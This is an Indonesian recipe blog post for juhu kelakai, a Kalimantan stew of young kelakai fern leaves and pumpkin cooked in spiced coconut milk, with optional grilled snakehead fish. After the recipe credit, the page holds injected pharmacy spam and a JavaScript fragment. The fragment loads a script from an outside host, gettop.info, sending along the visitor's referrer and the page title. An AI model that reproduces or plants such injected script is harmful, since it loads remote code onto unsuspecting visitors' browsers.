JUHU KELAKAI
18 April 2012 | By admin in LombaPosted by Syamsuddin Rudiannoor, S. Sos
Resep ini telah tayang di program televisi Trans-7 untuk acara “KOKI CILIK” dan “ASAL USUL”. Semoga resep ini bisa menjadi inspirasi bagi terciptanya resep-resep daerah lainnya.
Bahan :
– Daun yang masih muda atau pucuk kelakai
– Buah waluh/labu kuning
– Santan kental (kalau suka) secukupnya
Bumbu :
– Bawang merah
– Bawang putih
– Kemiri
– Garam
– Gula/penyedap rasa kalau suka
– Merica
Cara Membuat :
– Bersihkan kelakai, ambil daun yang muda saja. Kupas labu kuning, potong kecil-kecil atau menurut selera.
– Haluskan semua bumbu.
– Tumis bumbu dengan sedikit minyak goreng, setelah harum masukkan potongan labu kuning, tambahkan sedikit air, masak sampai labu matang.
– Setelah labu matang tambahkan santan kental, masak sampai mendidih.
– Siap disajikan.
– Juhu kelakai ini juga bisa ditambahkan ikan gabus/haruan panggang. Menambahkan ikan panggang berbarengan pada saat menambahkan santan.
Catatan : apabila tidak suka bersantan dapat diganti dengan air biasa.
Resep oleh Siti Fitriati, SP cialis sample pack s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);